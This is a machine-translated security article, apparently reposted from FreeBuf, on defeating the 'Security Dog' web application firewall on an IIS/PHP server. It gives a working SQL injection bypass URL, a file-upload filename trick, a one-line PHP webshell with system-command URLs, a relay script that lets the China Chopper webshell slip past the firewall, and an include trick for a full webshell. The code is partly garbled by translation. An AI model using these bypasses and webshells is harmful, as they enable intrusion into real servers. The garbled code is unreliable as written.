All-round security dog bypass

First, preface

Security dog is a familiar server security hardening products, it is said to have a 50W user volume. Recently after some research, found that some of the security dog protection functions, such as SQL injection, file upload, anti-Webshell, etc. can be bypassed, the following for everyone to introduce.

second, the test environment

This test environment is

Chinese version Win2003 sp2+php 5.3.28+mysql 5.1.72

Website Security Dog IIS version 3.2.08417

third, SQL injection bypass

Let's start by writing a PHP that has a SQL injection vulnerability:

1<?2 $uid=$_request[' ID '];3 if(!$conn= @mysql_connect("localhost", "root", "123456"))4  die(' <font size=+1>an Error occured</font>);5 if([email protected]mysql_select_db("Supe",$conn))6  die("<font Size=+1>an Error occured</font>);7 $text= "SELECT * from Supe_members where uid=".$uid;8 $rs=mysql_query($text,$conn);9  while($rom=Mysql_fetch_array($rs))Ten { One     Echo $rom["Username"]; A } -?>

I'm using the Supesite library, and I can see that there are obvious SQL injection vulnerabilities that can be successfully injected when there is no security dog:

When the security dog is installed, the injected statement is intercepted:

After testing found that the security dog this piece of the match should be \s+and this kind of, so as long as a way to remove the space, with ordinary comment/**/is not, safe dog also prevent this piece. But the inline annotation/*!and*/This wonder why the security dog did not intercept.

Successfully bypass SQL injection filtering with the following statement:

Http://192.168.200.115/inj.php?id=1/*!and*/1=2/*!union*//*!select*/1,2,version (), 4,5,6,7,8,9,10,11,12,13,14,15,16,17

Some people say that only post is available, but I'm testing the latest version of Secure dog get injections that can be bypassed in this way.

iv. File Upload bypass

Security dog's anti-upload is also done in the Web layer, that is, to analyze the HTTP protocol to prevent uploading, according to Yuange said security is a conditional statement, which is clearly not in compliance with security specifications, only check HTTP does not guarantee the file system layer problems.

Suppose you have an upload function for PHP:

1<?PHP2   if($_files["File"] ["error"] > 0)3     {4 Echo"Return Code:".$_files["File"] ["Error"]. "<br/>";5     }6   Else7     {8 Echo"Upload:".$_files["File"] ["Name"]. "<br/>";9 Echo"Type:".$_files["File"] ["Type"]. "<br/>";Ten Echo"Size:". ($_files["File"] ["Size"]/1024). "Kb<br/>"; One Echo"Temp file:".$_files["File"] ["Tmp_name"]. "<br/>"; A if(file_exists("upload/".$_files["File"] ["Name"])) -       { - Echo $_files["File"] ["Name"]. "already exists."; the       } -     Else -       { - Move_uploaded_file($_files["File"] ["Tmp_name"], +"Upload/".$_files["File"] ["Name"]); - Echo"Stored in:". Upload/".$_files["File"] ["Name"]; +       } A     } at?> - -<body> -<form action= "upload.php" method= "POST" -Enctype= "Multipart/form-data" > -<label for= "File" >Filename:</label> in<input type= "File" name= "file" id= "file"/> -<br/> to<input type= "Submit" name= "submit" value= "Submit"/> +</form> -</body> the
Then set the prohibit upload. php file in the security dog:
Then uploading PHP via the browser will be blocked:
We capture the uploaded HTTP packet through burp and then modify the post data ourselves. After some experiments, directly said the result, when the addition of a file name and content, so that two file names inconsistent, successfully bypassed the security dog protection, uploaded php files. The reason is that the security dog file name matching time with the first file name Test.jpg, is a compound security requirements, but webserver save the file while saving the second file name test.php, that is, if (Security_check (a)) {do (b) , causing the security check to be useless, the PHP file has been successfully uploaded:
Such upload data may be non-RFC compliant, but it achieves the purpose of bypassing interception. The conclusion is that each type of security check must be checked at the corresponding level, and not be taken for granted at the Web layer to do what the system layer should do.
five or one words Webshell bypass
For an attacker, the security dog is a very annoying thing is that the Webshell can not be carried out. Let's see how we can get around the safe dog's intercept of a word Webshell.
The first thing to know is that the safe dog anti-Webshell still relies on the file characteristic +http to judge, but Webshell really executes is at the script layer, examines the level to be not certainly also can easily detour past. Because PHP inside the function name can be a variable, the file where there are features Ah, upload the following php:
1 <? PHP 2 $_request [' A '] ($_request[' B ']); 3 ?>
Then execute it in the browser:
Http://192.168.200.115/small.php?a=system&b=dir
The system commands were executed successfully, and the PHP code could be executed as well:
Http://192.168.200.115/small.php?a=assert&b=phpinfo ();
six, Chopper bypass
The test found that although the sentence can be successfully executed, but in the kitchen knife but can not be used, and some people do not feel such a word of trouble, not to use a chopper. After analysis of the security dog to the chopper's HTTP request to intercept, the chopper's post data on the eval data made Base64 code, the security dog also relies on these characteristics to intercept, so to normal use of kitchen knives, must be in the local to do a forwarding, first of the characteristics of the data conversion. This idea is similar to local forwarding of pseudo-static injection.
First build the Web SERVER locally, and then write a PHP redirector:
1<?PHP2 $target= "http://192.168.200.115/small.php";//This is the address of the previous sentence.3 $poststr= ' ';4 $i=0;5 foreach($_post  as $k=$v)6 {7   if(strstr($v, "Base64_decode"))8   {9     $v=Str_replace("Base64_decode (", "",$v);Ten     $v=Str_replace("))",")",$v); One   } A   Else -   { -     if($k= = = "Z0") the       $v=Base64_decode($v); -   } -   $pp=$k." =".UrlEncode($v); -   //Echo ($PP); +   if($i? =n) -   { +     $poststr=$poststr." & ".$pp; A   } at   Else -   {   -     $poststr=$pp; -   } -   $i=$i+1; - } in $ch=curl_init (); - $curl _url=$target."?".$_server[' Query_string ']; tocurl_setopt ($ch, Curlopt_url,$curl _url); +curl_setopt ($ch, Curlopt_post, 1); -curl_setopt ($ch, Curlopt_postfields,$poststr); thecurl_setopt ($ch, Curlopt_returntransfer, 1); * $result= Curl_exec ($ch); $Curl_close ($ch);Panax Notoginseng Echo $result; -?>
This means that the eval data is Base64 decoded locally before being post to the target machine. Set the URL for the local forward PHP script in the chopper:
This way you can use the chopper to connect the previous sentence of the horse:
This will be able to use the kitchen knife, but we really do not need to stick to the chopper, to recommend a better tool-like knife Altman:
Http://www.i0day.com/1725.html
Its biggest feature is open source, which means that like a security dog based on characteristics to intercept, as long as the change to the source code to change the character string, it will never intercept. Of course, you need to change this code yourself.
Seven, Webshell Big Horse bypass
A word function is limited after all, what do you want to do with big horse? Is still the traditional include Dafa, passing a big.php content as follows:
1 <? PHP 2 include (' Logo.txt '); 3 ?>
And then the big immediately to logo.txt, so that the success of bypassing the security of the dog interception performed Webshell:
So the big horse also carried out smoothly.
Viii. Concluding remarks
The above from the SQL injection, upload, Webshell and so on several aspects to bypass the security dog protection, some bypass method the security dog may have already known, but why has not been filled? It is possible that the fear of filtering is too restrictive for certain applications, and I think it is understandable to make a choice between security and versatility, but I think it is the value of security researchers.
Here to send a few questions outside the complaints, many security companies are actually as a software company to do, do security software is to do development, and ignore the value of security research. The general principle of protection is very simple, but it is difficult to want to not affect the application and ensure security, if there is no deep understanding of the vulnerabilities and attacks of researchers, security products can not be a better way. I hope that the security companies do not too utilitarian, more attention to the researchers, security companies really can not just equate to software companies Ah!
The source of this article: http://www.freebuf.com/articles/web/37501.html
All-round security dog bypass